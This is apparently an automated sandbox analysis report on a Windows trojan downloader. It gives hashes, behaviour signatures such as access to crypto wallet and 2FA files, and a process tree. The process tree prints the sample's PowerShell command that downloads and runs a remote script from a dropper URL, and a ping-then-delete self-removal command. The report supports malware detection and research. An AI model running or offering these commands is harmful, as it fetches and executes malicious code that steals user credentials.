Analysis

  • max time kernel
    143s
  • max time network
    149s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20230915-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20230915-enlocale:en-usos:windows10-2004-x64system
  • submitted
    15-09-2023 15:40

General

  • Target

    SecuriteInfo.com.Trojan.DownLoader45.58708.31306.743.exe

  • Size

    247KB

  • MD5

    f17afa21e88b7a362db5ae8fdfa43de9

  • SHA1

    14b024dfe1f9aa6eb88bc7e2215e4877c92cc01e

  • SHA256

    c33deedefdb021c129cc4314ce7a032be5fbca79378f8581d0406857040a7fbf

  • SHA512

    efbdcd1c0fb91cb15de2935ed500fb0f9a8b3ef1491e9823850e97451348cd3a170bc0ad3c84086438508f7280f100a33ff8299a7de64093129b2d7ea83b8e0d

  • SSDEEP

    3072:98iTSP3d1hp5xnAs03vx54qylRs8crPGjl5mS3qI79TPJvLCw8DSmfNKgAiNNrc4:90zl37r79h2DSm1SgAOmhzN+

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

https://aszfiltration.com/storage/files/debug2.ps1

Signatures

  • Blocklisted process makes network request 3 IoCs
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Accesses 2FA software files, possible credential harvesting 2 TTPs
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Runs ping.exe 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 10 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\SecuriteInfo.com.Trojan.DownLoader45.58708.31306.743.exe
    "C:\Users\Admin\AppData\Local\Temp\SecuriteInfo.com.Trojan.DownLoader45.58708.31306.743.exe"
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:3480
    • C:\Windows\system32\cmd.exe
      "C:\Windows\sysnative\cmd.exe" /c "powershell -command IEX(New-Object Net.Webclient).DownloadString('https://aszfiltration.com/storage/files/debug2.ps1')"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:4300
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell -command IEX(New-Object Net.Webclient).DownloadString('https://aszfiltration.com/storage/files/debug2.ps1')
        3⤵
        • Blocklisted process makes network request
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:3456
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\SecuriteInfo.com.Trojan.DownLoader45.58708.31306.743.exe" >> NUL
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:1044
      • C:\Windows\SysWOW64\PING.EXE
        ping 127.0.0.1
        3⤵
        • Runs ping.exe
        PID:1596

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_hb4eb01s.x1p.ps1
    Filesize

    60B

    MD5

    d17fe0a3f47be24a6453e9ef58c94641

    SHA1

    6ab83620379fc69f80c0242105ddffd7d98d5d9d

    SHA256

    96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

    SHA512

    5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

  • memory/3456-5-0x000001D8334A0000-0x000001D8334C2000-memory.dmp
    Filesize

    136KB

  • memory/3456-10-0x00007FFA7C360000-0x00007FFA7CE21000-memory.dmp
    Filesize

    10.8MB

  • memory/3456-11-0x000001D8195D0000-0x000001D8195E0000-memory.dmp
    Filesize

    64KB

  • memory/3456-12-0x000001D8195D0000-0x000001D8195E0000-memory.dmp
    Filesize

    64KB

  • memory/3456-13-0x000001D8195D0000-0x000001D8195E0000-memory.dmp
    Filesize

    64KB

  • memory/3456-20-0x000001D833BA0000-0x000001D833BB4000-memory.dmp
    Filesize

    80KB

  • memory/3456-21-0x000001D833D00000-0x000001D833D1C000-memory.dmp
    Filesize

    112KB

  • memory/3456-22-0x000001D833D90000-0x000001D833DE0000-memory.dmp
    Filesize

    320KB

  • memory/3456-74-0x00007FFA7C360000-0x00007FFA7CE21000-memory.dmp
    Filesize

    10.8MB

  • memory/3456-75-0x000001D8195D0000-0x000001D8195E0000-memory.dmp
    Filesize

    64KB

  • memory/3456-76-0x000001D8195D0000-0x000001D8195E0000-memory.dmp
    Filesize

    64KB

  • memory/3456-83-0x000001D8195D0000-0x000001D8195E0000-memory.dmp
    Filesize

    64KB

  • memory/3456-85-0x00007FFA7C360000-0x00007FFA7CE21000-memory.dmp
    Filesize

    10.8MB